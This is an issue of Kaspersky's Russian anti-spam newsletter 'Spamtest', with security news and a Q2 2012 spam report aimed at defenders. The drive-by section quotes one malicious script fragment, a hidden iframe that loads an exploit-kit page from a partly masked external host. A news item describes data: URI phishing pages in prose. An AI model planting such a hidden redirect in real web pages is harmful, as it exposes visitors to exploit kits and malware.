Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Электронный журнал "Спамтест". Все о борьбе со спамом


Электронный журнал "Спамтест" No. 434

в этом номере:


Новости

Dropbox ввел систему двухфакторной аутентификации

Известный облачный сервис Dropbox усилил систему безопасности после того, как спамеры получили доступ к значительным объемам данных пользователей в июле этого года. Отныне пользователи Windows, Mac и Linux смогут воспользоваться опцией двухуровневой аутентификации.

При входе в систему, помимо обычного набора логин-пароль, пользователь должен ввести номер своего мобильного телефона и получить SMS с одноразовым паролем. Кроме того, он может воспользоваться приложениями для мобильных устройств, поддерживающими протокол TOTP (Time-based One-Time Password) — Amazon AWS MFA, Authenticator for Windows Phone 7 или Google Authenticator для Android, iOS и BlackBerry. При этом также генерируется одноразовый пароль.

В случае утери мобильного устройства генерируется новый 16-значный код, который должен храниться в безопасном месте.

Новая опция работает лишь на сборках 1.4.17 и 1.5.12. На данный момент пользователи Dropbox недовольны задержками при получении SMS с кодами.

В самом принципе двухфакторной аутентификации ничего нового нет. Подобные системы существуют уже более 10 лет. Пользователи их недолюбливают именно за дополнительные затраты времени.

Источник: The Register

Источник: Dropbox

Томское УФАС оштрафовало за спам цветочный магазин

Управление Федеральной антимонопольной службы по Томской области оштрафовало за распространение спама интернет-магазин ООО «Флора Экспресс». Размер штрафа составил 100 тыс. руб.

К антимонопольщикам обратилась москвичка, которая пожаловалась на спам, содержащий рекламу интернет-магазина. Как выяснилось, женщина являлась клиенткой ООО «Флора Экспресс» и изначально была не против получения рассылки. Однако в какой-то момент она решила отказаться от нее и сообщила об этом ООО «Флора Экспресс». Несмотря на отказ, письма с рекламой продолжали поступать на ее почтовый ящик.

Кроме того, анализ писем показал, что реклама привлекает внимание к дистанционной продаже букетов по конкретным ценам, однако текст рекламы не содержит сведений о продавце, следовательно, реклама не соответствует требованиям ст.8 ФЗ «О рекламе».

Источник: УФАС Томской области

Symantec обнаружила новый трюк фармаспамеров

С середины августа Symantec регистрирует спам, продвигающий сеть нелицензированных интернет-аптек с помощью URL-редиректоров, замаскированных под ссылку на файл, якобы выложенный в Сети.

По свидетельству экспертов, нелегитимные сообщения используют формат новостных рассылок. Все они снабжены URL, в конце которого проставлено одно из следующих расширений: .asp, .doc, .htm, .html, .mp3, .mpeg, .pdf, .php, .txt. Однако, против ожидания, такая ссылка вовсе не открывает файл, а перенаправляет пользователя на сайт Pharmacy Express ― брэнда, над которым давно шефствуют спамеры.

Как оказалось, данный сайт зарегистрирован в России, а хостится он в Гонконге и на Украине. Исследователи полагают, что спамеры взяли на вооружение такую форму URL для обхода защитных фильтров: те обычно настроены на поиск других расширений. Кроме того, ссылка, оформленная как указатель файла, в сочетании с новостным текстом способна ввести в заблуждение пользователя, который может поддаться искушению и открыть «файл», подсказанный незнакомым отправителем.

Источник: Symantec

data: URI — находка для фишера

Норвежский студент Хеннинг Клевьер (Henning Klevjer) продемонстрировал способ создания простейших фишинговых страниц, не требующий их размещения на веб-ресурсах.

Подход, использованный учащимся университета Осло в своем исследовании, не нов: для маскировки зловредного контента Клевьер использовал определённую стандартом RFC 2397 схему data: URI. Эта схема позволяет внедрять в строку URL элементы данных, необходимые для воспроизведения в браузере небольшой страницы или изображения точно так же, как если бы они были вызваны с внешнего ресурса. Получается, что итоговый URL (унифицированный указатель ресурсов) в действительности ни на что не указывает.

Синтаксис у data: URI довольно прост:
data:[<тип данных>][;base64],<данные>
Эту схему поддерживает большинство современных веб-браузеров, что, по мнению Клевьера, открывает широкое поле деятельности для фишеров. Простейшие страницы, имитирующие банковский сайт или веб-формы для ввода личных данных, легко рассылать в спаме в виде шифрованных URI. Уменьшить длину громоздких «адресов», способную вызвать подозрения, помогут сервисы сокращения ссылок, коих много в интернете. Поскольку такие ловушки не привязаны к сетевым ресурсам, их невозможно заблокировать или уничтожить, а фишерам можно уже не заботиться о веб-хостинге. Конечно, прием и хранение украденных данных потребуют создания сетевых репозиториев, однако эта проблема тоже решаема ― с помощью специализированных DNS-запросов.

Исследователь отмечает, что фишинговый контент, внедренный в URI описанным им способом, можно автоматически персонализировать с помощью выуженной из интернета информации и использовать такие «ссылки» в spear phishing атаках. Схема data: URI позволяет даже распространять Java-апплеты без привлечения внешних ресурсов.

Единственной серьезной проблемой для злоумышленников является ограничение по размеру URL, выставленное в браузере. Клевьер попробовал запустить спрятанную в URI тестовую страницу размером 26 КБ в Google Chrome, IE9, Firefox и Opera. Последние два браузера ее беспрепятственно воспроизвели, а Internet Explorer признал предложенный размер недопустимым. Chrome по умолчанию блокирует расшифровку URI при наличии редиректов, таких как сервисы коротких ссылок, и выводит пользователю уведомление об ошибке, показывая полный адрес. Однако при нажатии вручную кнопки «enter» он все-таки вывел страницу на экран. При отсутствии редиректа Chrome послушно воспроизвел запрошенный контент при активации URI щелчком «мыши».

Источник: ISC Diary

Источник: Phishing by data URI (pdf)

0-day Java-эксплойт раздается через спам

Эксперты ISC SANS и Websense сообщают о появлении вредоносных писем, завлекающих пользователей на площадки с эксплойтом к только что пропатченной уязвимости в Java.

Спам-сообщения, обнаруженные ISC SANS, используют текст реального уведомления Microsoft, которое компания разослала пользователям в конце августа в связи с внесением изменений в Соглашение на обслуживание (Microsoft Services Agreement and Communication Preferences). Спамеры заменили лишь ссылку, которая теперь автоматически перенаправляет получателя письма на ресурс с Blackhole, в комплект которого злоумышленники уже добавили эксплойт к недавно всплывшей уязвимости нулевого дня ― CVE-2012-4681.

По свидетельству экспертов, данная спам-рассылка осуществляется через почтовый сервер, размещенный на территории Китая, и использует множество взломанных сайтов в качестве редиректов. Зловредный архив Leh.jar, который атакует пользователя, активировавшего спамерскую ссылку, определяется антивирусами списка VirusTotal как эксплойт к Java CVE-2012-4681; зловред, загружаемый на машину жертвы при успешной эксплуатации уязвимости, ― как вариант ZeuS.

Вредоносные письма, попавшие на радары Websense, имитируют сообщение от Amazon.com с просьбой подтвердить заказ, якобы оставленный получателем. Гиперссылка «click here», вставленная по тексту, привязана к редиректу, который перенаправляет пользователя на Blackhole-площадку. В ее арсенале также обнаружен файл Leh.jar, который, согласно VirusTotal, содержит эксплойтк CVE-2012-4681.

Источник: ISC SANS

Источник: Websense


Спам во втором квртале 2012 года

Дарья Гудкова

Мария Наместникова

Цифры квартала

  • Доля спама составила в среднем 74,3% почтового трафика. Это на 2,3% меньше показателей первого квартала 2012.
  • Больше всего спама по-прежнему рассылается из Азии (53%) и Латинской Америки (14%).
  • Доля писем, содержавших вредоносные вложения, уменьшилась на 0,3% по сравнению с предыдущим кварталом и составила 3%.

 

Купоны vs спам: уменьшение доли спама

Во втором квартале 2012 года доля спама продолжала сокращаться и составила в среднем 74,3%, что на 2,3% меньше, чем в прошлом квартале.

Наблюдаемое уменьшение доли спама в почтовых потоках – в какой-то мере явление сезонное. В летний период многие компьютеры, зараженные спам-ботами, выключены, поскольку их владельцы находятся в отпуске. С другой стороны, сокращение доли спама на фоне летнего уменьшения чистого почтового трафика может указывать на то, что мы имеем дело с общей, а не только с сезонной тенденцией.

Несколько лет назад в интернете появились новые сервисы – сайты групповых скидок, на которых пользователям предлагаются так называемые купоны. Купив купон, пользователь предъявляет его при покупке товара/услуги и получает скидку. Купонные сервисы быстро стали популярны во всем мире: многие компании стремятся с их помощью расширить клиентскую базу, а клиенты в свою очередь получают выгодные предложения.

Появление новой рекламной площадки, предложения которой распространяются в основном через электронную почту, не могло не отразиться на спаме.

В мусорной почте в западных странах, как известно, преобладает партнерский спам. При этом основную часть партнерских рассылок составляет реклама нелегальных товаров или сервисов. Однако в почтовом трафике существуют и партнерские рассылки с рекламой легального товара (например, сувенирной продукции или цветов), и спам-сообщения, не имеющие отношения к партнеркам.

Купонные сервисы двояко повлияли на западный спам: с одной стороны, само слово «купоны» стало использоваться спамерами для привлечения внимания к рассылкам, с другой – эти рекламные площадки оттянули на себя часть рекламы легальных товаров/услуг, распространявшейся в спаме. Это неудивительно, ведь купонные сервисы являются легальными рекламными площадками, и реклама, идущая через них, более эффективна, чем спам, так как не вызывает раздражения у пользователей, получающих рекламные предложения, не блокируется спам-фильтрами, а рассылки направляются целевой аудитории, заведомо заинтересованной в покупке. В результате оттока компаний, рекламировавших свои товары в спаме, численность спамерских рассылок в западном почтовом трафике несколько сократилась.

В странах, где купонные сервисы популярны, а доля заказного спама превышает долю партнерского, например в СНГ, купоны повлияли на спам еще больше. Многие фирмы, ранее использовавшие спам как основной инструмент рекламы, если не полностью переключились на купонные сервисы, то по крайней мере не пренебрегают этой легальной возможностью. Так можно предположить, что в России с заказов рекламы у спамеров на использование купонных сервисов практически полностью перешли туристические компании. По итогам второго квартала 2012 года доля писем рубрики «Отдых и путешествия» в Рунете, несмотря на сезон отпусков, составила лишь немногим более 1%. В то же время около 10% всех предложений российских купонных сервисов — это предложения от туристических фирм и экскурсионных бюро.

Возникновение все большего количества подобных проектов также стимулирует рекламодателей переключаться на этот вид рекламы: в жесткой конкурентной борьбе купонным сервисам приходится предлагать рекламодателям все более выгодные условия сотрудничества. С другой стороны, самим сервисам порой приходится прибегать к спаму для саморекламы, чтобы расширить свою аудиторию.

Уменьшение доли почтового мусора в трафике также может быть связано со складывающейся сложной экономической ситуацией в мире.

Спам и экономическая ситуация

Изменения в тематическом составе спама

Необычно малый процент рубрики «Отдых и путешествия» в русскоязычном спаме объясняется не только уходом рекламодателей на легальную рекламную площадку, что, безусловно, является положительной тенденцией в мире интернет-маркетинга, но и тревожными тенденциями в мировом экономическом развитии. Дело в том, что многие мелкие и средние турфирмы в России уже начали тонуть в новой волне экономического кризиса, что неминуемо приводит к снижению количества их рекламы, в том числе и в спаме.

Мы наблюдаем и другие признаки того, что экономический кризис тем или иным образом уже влияет на спам.Так в англоязычном спаме в мае начала увеличиваться доля сообщений тематики «Личные финансы». В последний весенний месяц эта рубрика составила 23,5% всего англоязычного спама, а уже в июне выросла более чем в три раза и достигла 73%. При этом бОльшую часть таких сообщений в июне составили письма с предложениями нелегального заработка. Похожая картина наблюдается и в спаме на немецком языке: в последние месяцы в нем становится все больше предложений подозрительной работы. Аналогичные изменения мы уже наблюдали во время кризиса 2008-2009 годов.

В русскоязычном спаме на фоне напряженной экономической ситуации в Европе в феврале 2012 года стала увеличиваться доля тематики «Недвижимость» (с 5,5% до 9,2%). Уже через месяц она составляла более 15% всего спама в Рунете, а в апреле — почти 20%.

В последний раз неожиданный рост числа спам-писем тематики «Недвижимость» в Рунете мы наблюдали в 2008-2009 годах во время глобального финансового кризиса. В то время конъюктура рынка была несколько иной, чем сейчас, и доля такого спама увеличилась с 2-3% до 7-8%.

Серьезное увеличение процента этой рубрики на фоне уменьшения доли мусорной почты в почтовом трафике свидетельствует о значительном увеличении объема рекламы недвижимости в российском спаме. Для продажи большей частью предлагаются объекты в проблемных с экономической точки зрения странах, например в Испании. Это объясняется тем, что мелкие инвесторы стремятся продать недвижимость, цена на которую по всем прогнозам скоро упадет. Спам же в Рунете по-прежнему является самым дешевым способом рекламы для таких объектов.

Обратим внимание и на соотношение партнерского и заказного спама в Рунете.

Доля заказного спама превысила к началу второго квартала 60%, а доля партнерского спама сократилась до 30%, после чего ситуация стабилизировалась, и оба показателя меняются незначительно. Саморекламу спамеры рассылают не слишком активно, что не в последнюю очередь связано с тем, что заказов у них достаточно.

Однако на это распределение в настоящий момент влияют сразу несколько факторов: во-первых, деловая активность в пору отпусков в сфере спам-бизнеса, как и во всякой другой, снижается, что является еще одной причиной низкого уровня саморекламы спамеров. Во-вторых, если исключить рубрику «Недвижимость» с ее необычно высоким процентом из заказного спама, то доля последнего составит порядка 44%. И хотя график выглядит типично для стабильной ситуации, реальная картина, как видим, иная.

Кроме того, доля заказного спама, даже с учетом «Недвижимости», значительно ниже аналогичного показателя второго квартала прошлого года (около 85%), в то время как доля партнерского спама, соответственно, практически вдвое выше.

Во втором квартале 2012 в спаме уже появились сообщения, эксплуатирующие тему кризиса и для привлечения внимания к вполне традиционным партнерским рассылкам, и для рекламы сомнительных дешевых кредитов. Кроме того мы фиксируем сообщения на английском и на русском языках, предлагающие участие в семинарах, основной темой которых является экономический кризис в целом или кризис Еврозоны в частности.

Если экономическая ситуация в мире будет обостряться, вероятно, доля заказного спама в Рунете сократится. Ведь в этом случае многие мелкие и средние компании урежут свои расходы, и в первую очередь – расходы на рекламу. Если наше предположение верно, это приведет к дальнейшему уменьшению доли спама в почтовом трафике — ведь основной вклад с спам-трафик сейчас делает заказной спам. Мы полагаем, что при этом с завершением сезона отпусков значительно вырастет доля саморекламы спамеров. Вероятно, увеличится и доля партнерского спама, но ненамного. Дело в том, что пользователи Рунета не являются целевой аудиторией партнерских рассылок, – такой спам распространяется в СНГ лишь в расчете на случайных покупателей рекламируемых товаров/услуг.

Вредоносный спам

Если в условиях сложной экономической ситуации спам будет развиваться по сценарию 2008-2009 годов, мы имеем все основания опасаться увеличения доли мошеннического и вредоносного спама в ближайшие несколько месяцев. В свете этого обратим внимание на некоторые приемы злоумышленников, которые они использовали для рассылки вредоносного кода. Среди этих приемов и новые, и традиционные, но очень популярные у злоумышленников.

Спам для drive-by

Как известно, в спаме распространяются не только вредоносные программы в виде вложений, но и вредоносные ссылки. Даже просто пройдя по ссылке, пользователь может быть переадресован на страничку с наборами эксплойтов, совершенно не подозревая об этом, и компьютер будет заражен в результате так называемой drive-by атаки.

Во втором квартале 2012 года было очень много рассылок, используемых для инициации drive-by атак. Рассмотрим общую схему подобных атак на конкретных примерах:

  1. Пользователь получает сообщение имитирующее уведомление от популярного ресурса, официальное письмо из банка, информационную рассылку или письмо от знакомого, в котором его просят непременно пройти по ссылке. Часто в письмах присутствуют фразы, побуждающие пройти по ссылке как можно быстрее, к примеру, "as soon as possible" и "urgently".
  2. Пройдя по ссылке, пользователь попадает на сайт со встроенным обфусцированным скриптом (в письме, приведенном на скриншоте, скрипт детектировался Антивирусом Касперского как Trojan.Script.Generic). Задача скрипта – с помощью тега iframe перенаправлять пользователя на вредоносный сайт.
  3. Ниже приведен фрагмент исходного кода:

    document.write (s) <iframe src='http://r*****d.su:8080/images/aublbzdni.php' width='10' height='10' style='visibility:hidden;xposition:absolute;left:0;top:0;'></iframe>

    На странице видна лишь надпись «Loading...Please Wait...».

  4. В данном случае пользователь перенаправлялся на сайт с Phoenix exploit pack. В других случаях ссылки вели еще и на Blackhole exploit pack. После перехода на такие сайты компьютер пользователя начинают атаковать эксплойты, рассчитанные на уязвимости в Java, Flash Player или Adobe Reader. При удачном для злоумышленников стечении обстоятельств (то есть если пользователь использует уязвимую версию хотя бы одного из указанных приложений), на компьютер пользователя загружается исполняемый файл, который связывается с командным центром и в свою очередь загружает на компьютер различные вредоносные программы.

Вредоносное ПО на Wiki и Amazon

В апреле в спаме появились рассылки, имитирующие официальные сообщения Facebook. Основной особенностью этих сообщений было то, что ссылка, пройдя по которой, пользователь должен был быть переадресован на вредоносный или фишинговый сайт, вела не на недавно зарегистрированный домен или взломанный легитимный сайт, а на специально созданные странички на Wikipedia или Amazon. Однако все ссылки в полученных нами сообщениях не работали уже через несколько минут после обнаружения писем. Мы предполагали, что злоумышленники разместили вредоносные скрипты на созданных ими страницах Wikipedia, а также под видом рекламы секонд-хенд товаров на сайте Amazon.com, однако команды по разрешению инцидентов обоих сервисов среагировали быстро, и уже во время распространения спама ссылки были нерабочими.

Зловреды - путешественники

Злоумышленники, распространяющие вредоносные письма, продолжают совершенствовать свои приемы социальной инженерии. Так, в течение квартала нами были зафиксированы рассылки, вкупе представляющие собой целый «туристический пакет», видимо, подготовленный спамерами специально к сезону отпусков.

Во-первых, речь идет о подделках под уведомления от авиакомпаний о возможности онлайн-регистрации на рейс, содержащих вредоносные ссылки. Если в прошлом квартале мы уже фиксировали такие рассылки якобы от US Airways, то в этом квартале появились аналогичные сообщения, имитирующие письма от British Airways.

Помимо авиаперелетов, злоумышленники эскплуатировали тему бронирования отелей. Мы зафиксировали рассылку якобы от сайта booking.com. В письмах, предлагающих подтвердить бронирование номера, содержалось вредоносное вложение, детектируемое Антивирусом Касперского как Trojan-Spy.Win32.Zbot.

Сообщение выглядит не слишком убедительно и кроме поля From ничем не похоже на оригинальное письмо от booking. Однако в летний период сайты бронирования отелей очень популярны, а пользователи, к сожалению, не всегда внимательны. Так что у этой, по всей видимости, на скорую руку созданной подделки жертв могло быть довольно много.

Помните, что крупные сервисы никогда не присылают подтверждение бронирования в zip-архивах. В случае сомнений в подлинности сообщения всегда можно связаться с компанией, выйдя на ее официальный сайт и воспользовавшись формой обратной связи, телефоном или электронной почтой, которые указаны на сайте.

Горячие темы в спаме

«Президентский» спам

Можно сказать, что во втором квартале наиболее популярной личностью у спамеров стал Барак Обама. Мы обнаружили множество писем с упоминанием американского президента. Интересно, что основную массу этих рассылок составляют сообщения, содержащие критику новых законопроектов, одобренных президентом. Письма были хорошо оформлены и содержали призывы поставить свою подпись против действий Обамы. Кроме того, в письмах содержалась просьба перечислить деньги на счета некоторых официальных американских организаций.

В США политический и прочий некоммерческий спам не попадает под CAN-SPAM Act. То есть официальные организации действительно могли рассылать подобные сообщения.

Рассылки, попадающие под американский закон о спаме и эксплуатирующие имя Обамы, тоже встречались в спам-потоках. При анализе сообщений с рекламой нелегальной фармакологической продукции или реплик часов и с темой вроде «Обама пойман на горячем», поневоле вспоминаешь точно такие же письма почти четырехлетней давности. Тогда, после избрания Обамы президентом, его имя встречалось чуть ли не в каждой крупной спамерской рассылке, а заголовки нередко выглядели так: «Обама раскрыл свои секреты» или «Обама женщина!». Сейчас спамеры, кажется, извлекли свои старые шаблоны, желая воспользоваться новой волной интереса пользователей к Обаме, на этот раз вызванной приближением президентских выборов в США, в которых действующий президент снова выступит как кандидат.

Президентская гонка во Франции тоже оказала некоторое влияние на тематический состав спама. В почтовом трафике встречались, хотя и не столь многочисленные, спам-рассылки, посвященные кандидатамв президенты. В частности, во французских спам-потоках встречались письма с предложением приобрести футболки, агитирующие за Николя Саркози. Агитация заФрансуа Оланда, который в результате был выбран президентом, в спаме практически отсутствовала.

Тематическое мошенничество

Нигерийским спамерам с апреля не дает покоя нестабильная ситуация в Сирии. В нашем блоге мы уже писали о сообщениях якобы от жены Башара Асада. Сообщения с тем же текстом мы продолжали фиксировать на протяжении всего квартала. Но в чем нигерийским спамерам не откажешь, так это в фантазии, поэтому только одним шаблоном писем дело не ограничилось. В спаме встречаются как нигерийские письма как от «членов семьи и приближенных Асада», так и от рядовых граждан Сирии.

Спамеры не обошли вниманием и Евро 2012. Начиная с зимы в спаме якобы от имени Лондонского Олимпийского комитета мошенники распространяют сообщения о выигрышах в «олимпийских» лотереях, причем чем ближе была Олимпиада, тем активнее шли рассылки.

География спама

Страны – источники спама

Во втором квартале 2012 география источников спама значительно изменилась по сравнению с первым кварталом. На первое место среди стран – источников спама неожиданно вышел Китай, откуда было отправлено около 19% всего спама. Кроме того, после длительного перерыва в тройку лидеров вернулись США, поделив с Индией второе место: из обеих стран было отправлено одинаковое количество спама – 11,7%.

ТOP 10 стран – источников спама:

  1. Китай 18,83%
  2. США 11,66%
  3. Индия 11,66%
  4. Вьетнам 4,97%
  5. Бразилия 4,77%
  6. Корея (Южная) 4,28%
  7. Тайвань 2,58%
  8. Россия 2,24%
  9. Перу 2,17%
  10. Казахстан 1,94%

В прошлом квартале мы писали про перераспределение ботнетов и возможное изменение географии спама. Однако столь резкой перемены мы не ожидали. Китай несколько лет назад уже был в лидерах спамерского рейтинга, но после принятия в 2006 году закона против спама, количество рассылаемой из этой страны мусорной почты резко сократилось. Прошло 6 лет, и спамеры, видимо, забыли об этом законе, так как он не применялся активно.

В целом возвращение в топ Китая и США логично: хороший интернет и огромное число пользователей, машины которых можно заразить спам-ботами и использовать для рассылки спама, привлекают спамеров.

Несмотря на перераспределение источников спама, основные тенденции не меняются: все больше спама идет из Азии и Латинской Америки. Так, в ТОP 20 во втором квартале вошли 9 стран азиатского региона, 5 – латиноамериканского, всего 1 страна Западной Европы (Великобритания) и 1 страна Восточной Европы (Россия).

В разные регионы спам приходит из разных стран. Так, в страны Западной Европы больше всего спама приходит из Китая (в другие регионы спама из Китая приходит существенно меньше, и только за счет рассылки спама в Западную Европу Китай вышел на первое место в общемировом рейтинге), в Восточную Европу – из Индии, в Северную Америку – из США.

Распределение источников спама по регионам

Большая часть спама в мире (52,6%) по-прежнему рассылается из стран Азиатского региона. Этот регион уже давно является лидером в рассылке спама, но в этом квартале доля рассылаемого из Азии спама заметно увеличилась. Произошло это, в частности, благодаря Китаю, занявшему в этом квартале первое место в рейтинге стран – источников спама.

Кроме того, выросла доля спама, рассылаемого с территории Северной Америки (12%). Почти весь спам из этого региона рассылается из США. Относительно недавно США занимали 1-е место в нашем рейтинге. Но 2 года назад несколько командных центров крупных ботнетов были закрыты, и количество спама из этой страны существенно сократилось. Теперь спамеры вновь строят ботнеты в США, что следовало ожидать, ведь количество пользователей интернета в этой стране очень высоко, а значит, и велики размеры потенциального ботнета.

Что касается остальных регионов, то можно отметить дальнейшее сокращение спам-трафика из Европы, как Западной (5,9%), так и Восточной (6,5%). Латинская Америка (13,7%) по-прежнему остается на втором месте среди регионов – источников спама, хотя по сравнению с предыдущими кварталами доля спама, рассылаемого из этого региона, уменьшилась.

Вредоносные вложения в почте

Во втором квартале 2012 года средний процент писем, содержавших вредоносные вложения, уменьшился на 0,3 пункта по сравнению с предыдущим кварталом и составил 3%. В течение всего квартала колебание процента вредоносных вложений в электронной почте было незначительным.

Напомним, что невысокая доля вредоносных вложений в почте не указывает на уменьшение доли вредоносных рассылок как таковых, ведь в почте распространяются не только зловреды в виде вложений, но и ссылки на зараженные веб-странички.

Распределение атак через почту по странам

Во втором квартале 2012 года распределение срабатывания нашего почтового антивируса по странам выглядело следующим образом:

  1. США 15,33%
  2. Великобритания 7,60%
  3. Германия 7,21%
  4. Вьетнам 6,68%
  5. Австралия 5,75%
  6. Гонконг 4,80%
  7. Италия 4,45%
  8. Китай 4,36%
  9. Индия 4,02%
  10. Бразилия 3,86%

В целом, в сравнении с предыдущим кварталом рейтинг стран по срабатываниям почтового антивируса остался практически неизменным: девять из десяти стран не покидали его на протяжении всего полугодия, лишь менялись местами. Доли атак на страны из ТОР 10 также изменились незначительно – для всех стран, кроме Гонконга, это изменение осталось в пределах 2%.

Гонконг, занимавший в первом квартале 2012 года вторую строчку рейтинга, во втором квартале выпал из ТОР 5, и доля детектирований почтового антивируса в этой стране составила 4,8% (-4%).

На первой строчке рейтинга вновь США, не уступавшие никому этой позиции ни разу за прошедшие шесть месяцев. По сравнению с прошлым кварталом доля детектирований почтового антивируса на территории этой страны увеличилась на 2%. Вторую и третью строчки заняли западноевропейские государства – Великобритания и Германия, прирост долей которых составил 2% и 1,4% соответственно.

Наиболее часто детектируемые в почте программы

Лидером среди наиболее часто детектируемых нашим почтовым антивирусом программ по итогам второго квартала 2012 года опять стал зловред Trojan-Spy.HTML.Fraud.gen. Доля детектов этой программы по сравнению с прошлым кварталом сократилась на 2% и составила 12,5%. Подробно об этой вредоносной программе можно почитать здесь. Мы лишь напомним, что этот зловред используется фишерами и представляет собой html-страничку, подделанную под регистрационную форму финансовой организации или какого-либо онлайн-сервиса. Регистрационные данные, введенные на такой страничке, отправляются злоумышленникам.

В TOP 10 по-прежнему много почтовых червей. Email-Worm.Win32.Mydoom.m сохранил свою позицию (2-е место). Как и его собрат Mydoom.l (9-е место), этот почтовый червь выполняет только две функции: сбор электронных адресов на зараженных машинах и рассылку по ним самого себя. Тем же функционалом обладает и занявший 5-е место Email-Worm.Win32.NetSky.q. Еще одни червь, Email-Worm.Win32.Bagle.gt (3-е место), в дополнение к уже обозначенному выше традиционному функционалу почтовых червей обращается к интернет-ресурсам для загрузки оттуда вредоносных программ.

На 6-м месте находится программа-упаковщик Packed.Win32.Katusha.o, занимавшая в июне вторую строчку рейтинга. Упаковщики этого семейства часто попадают в наш рейтинг. Они используются для обхода детектирования антивирусными средствами других вредоносных программ, чаще всего поддельных антивирусов.

Фишинг

По итогам второго квартала 2012 года атаки на пользователей социальных сетей составили более четверти всех попыток кражи пользовательских данных с использованием приемов фишинга.

Распределение TOP 100 организаций, атакованных фишерами, по категориям
(cрабатывание антифишинга, второй квартал 2012 года):

  1. Социальные сети 25,87%
  2. Финансовые и платежные организации, банки 23,64%
  3. Онлайн-магазины, интернет-аукционы 18,96%
  4. Поисковики 12,62%
  5. IT Вендоры 6,61%
  6. Электронная почта, программы мгновенного обмена сообщениями 3,92%
  7. СМИ 0,76%
  8. Онлайн-игры 0,58%
  9. Правительственные организации 0,22%
  10. Другие 6,81%

Рейтинг категорий атакованных фишерами организаций основывается на срабатываниях компонента Антифишинг в наших продуктах на компьютерах пользователей. Антифишинг детектирует все фишинговые ссылки, по которым пытался пройти пользователь, — будь то ссылка в спамовом письме или в интернете. Подробную информацию о каждой категории можно получить здесь.

Категория «Социальные сети» опередила «Финансовые организации» по количеству проведенных на нее фишинговых атак. Рост доли атак на социальные сети обусловлен наступлением летних каникул. В этот период в Сеть выходит множество студентов и школьников, часто пользующихся такими сервисами. С другой стороны, эта аудитория редко имеет аккаунты в онлайн-банкинге, да и в целом летом финансовая активность снижается, что приводит к уменьшению доли спама, нацеленного на финансовые организации. Однако атаки на финансовые организации остаются самыми выгодными для злоумышленников, поэтому их процент, хотя и уменьшился, но остается на очень высоком уровне.

Рубрики спама в Рунете

Более четверти всего спама в Рунете – это реклама различных курсов и семинаров, которую мы относим к рубрике «Образование». Эта рубрика в течение трех лет является бессменным лидером нашего рейтинга. Ее доля продолжает увеличиваться на фоне уменьшения общего количества спама, а это значит, что количество писем этой тематики в Рунете остается на прежнем уровне.

Тематическое распределение спама в Рунете: TOP 10

  1. Образование 26,17%
  2. Недвижимость 16,38%
  3. Медикаменты; товары/услуги для здоровья 16,31%
  4. Услуги по ремонту и благоустройству 7,87%
  5. Коллекции фильмов на DVD 6,20%
  6. Реклама спамерских услуг 5,18%
  7. Юридические услуги и аудит 2,66%
  8. Полиграфия 2,35%
  9. Компьютерное мошенничество 1,71%
  10. Реплики элитных товаров 1,31%

Доля рекламы недвижимости увеличилась на 6,5% по сравнению с первым кварталом. Благодаря такому впечатляющему росту тематика «Недвижимость» заняла вторую строчку в рейтинге тематик Рунета.

Выше мы уже обращали вниманиена рубрику «Отдых и путешествия», которая, несмотря на начало сезона отпусков, то есть самую горячую пору для туристического бизнеса, составляет немногим более 1% от всех спам-сообщений в Рунете. Даже по сравнению с первым кварталом, не самым удачным для таких рассылок, доля сообщений, предлагающих отдых и путешествия, сократилась более чем в два раза.

Заключение

Доля спама продолжает сокращаться. Это вызвано различными причинами, влияющими на спам-бизнес. В их числе и сезонные (в связи с порой отпусков многие машины, зараженные спам-ботами, отключены), и экономические (на спаме сказывается атмосфера тревоги, связанная с возможным экономическим кризисом), и конкурентные (некоторые рекламодатели уходят от спамеров и становятся клиентами купонных сервисов). По нашим прогнозам, в случае сохранения экономической ситуации в ее нынешнем состоянии или, тем более, в случае ее обострения, доля спама продолжит уменьшаться, в том числе и по завершению сезона отпусков. Мы не исключаем возможности постепенного снижения доли спама до отметки 65% в течение ближайшего года.

География источников спама сильно изменилась. Заинтересованные в хорошем интернете и большом количестве пользователей злоумышленники перебросили мощности своих ботнетов в Китай и США, откуда в настоящее время распространяется больше всего спама. Хотя мы прогнозировали изменения в распределении источников рассылки спама, мы не ожидали, что они будут столь скорыми. С другой стороны, сохранилась тенденция к увеличению доли спама, распространяемого из Азии и Латинской Америки.

Мы не случайно подробно остановились на некоторых приемах спамеров, распространяющих вредоносный код. Опыт наблюдения за спамом во время кризиса 2008 – 2009 года свидетельствует, что выраженный рост доли вредоносного кода в почте практически гарантирован. Таким образом, спам станет значительно опаснее. Особенно стоит подчеркнуть, что за последние годы арсенал злоумышленников сильно расширился и пополняется новыми приемами социальной инженерии чуть ли не каждый месяц.

Диаграммы и примеры спамовых писем смотрите на сайте Securelist.com/ru.




Написать письмо

Прислать статью редактору

Мнение редакции не всегда совпадает с мнением авторов материалов.
Редакция оставляет за собой право не публиковать присланную статью без объяснения причин.
Присланные статьи не рецензируются.

(C) "Лаборатория Касперского", 1997 - 2012


В избранное